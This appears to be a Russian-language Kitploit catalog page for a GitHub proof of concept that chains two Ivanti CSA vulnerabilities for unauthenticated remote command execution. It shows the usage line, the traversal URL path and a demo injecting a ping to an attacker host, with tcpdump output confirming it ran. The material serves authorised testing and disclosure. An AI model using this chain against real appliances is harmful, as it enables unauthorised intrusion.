Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-8190-unauth — Объединение CVE-2024-8963 и CVE-2024-8190 - Для неаутентифицированного удаленного выполнения кода на Ivanti CSA 4.6 и ниже | Kitploit
Инструменты/GitHubGitHub/flyingllama87/cve-2024-8190-unauth
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubflyingllama87/cve-2024-8190-unauth

CVE-2024-8190-unauth

Объединение CVE-2024-8963 и CVE-2024-8190 - Для неаутентифицированного удаленного выполнения кода на Ivanti CSA 4.6 и ниже

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
211 год назадЕщё не проверено

CVE-2024-8190 без аутентификации

Описание

Объединение CVE-2024-8963 и CVE-2024-8190 — PoC для неаутентифицированного RCE на Ivanti CSA версии 4.6 и ниже.

CVE-2024-8963

Обход пути в Ivanti CSA до версии 4.6 Patch 519 позволяет удаленному неаутентифицированному атакующему получить доступ к ограниченной функциональности.

CVE-2024-8190

Уязвимость внедрения команд ОС в Ivanti Cloud Services Appliance версии 4.6 Patch 518 и ниже позволяет удаленному аутентифицированному атакующему выполнить удаленный код. Для эксплуатации этой уязвимости атакующий должен обладать привилегиями уровня администратора.

Данный PoC объединяет две уязвимости, демонстрируя, как CVE-2024-8190 может быть использована без аутентификации.

Использование

root@kitploit:~
python3 ./cve-2024-8190.py <target_url> '<CMD>'

Демонстрация

root@kitploit:~
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] ВНИМАНИЕ: Этот скрипт предназначен только для авторизованного тестирования и образовательных целей. Несанкционированное использование незаконно.
[*] Получение https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Получено значение LDCSA_CSRF: sid:483045<УДАЛЕНО>
[*] Отправка полезной нагрузки...
[!] Время ожидания запроса истекло. Проверьте, выполнилась ли команда на цели.

Ответ

root@kitploit:~
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64

Благодарности

PoC от Horizon3.ai для CVE-2024-8190, на котором этот основан:
https://github.com/horizon3ai/CVE-2024-8190

Шаблон nuclei от ProjectDiscovery для CVE-2024-8963.yaml:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml

P.S. ProjectDiscovery — молодцы!

Отказ от ответственности

Не будьте мудаками.

Данное программное обеспечение создано исключительно для академических исследований и разработки эффективных защитных методов и не предназначено для атак на системы без явного разрешения. Авторы проекта не несут ответственности за неправомерное использование программы. Используйте ответственно.

Скачать инструмент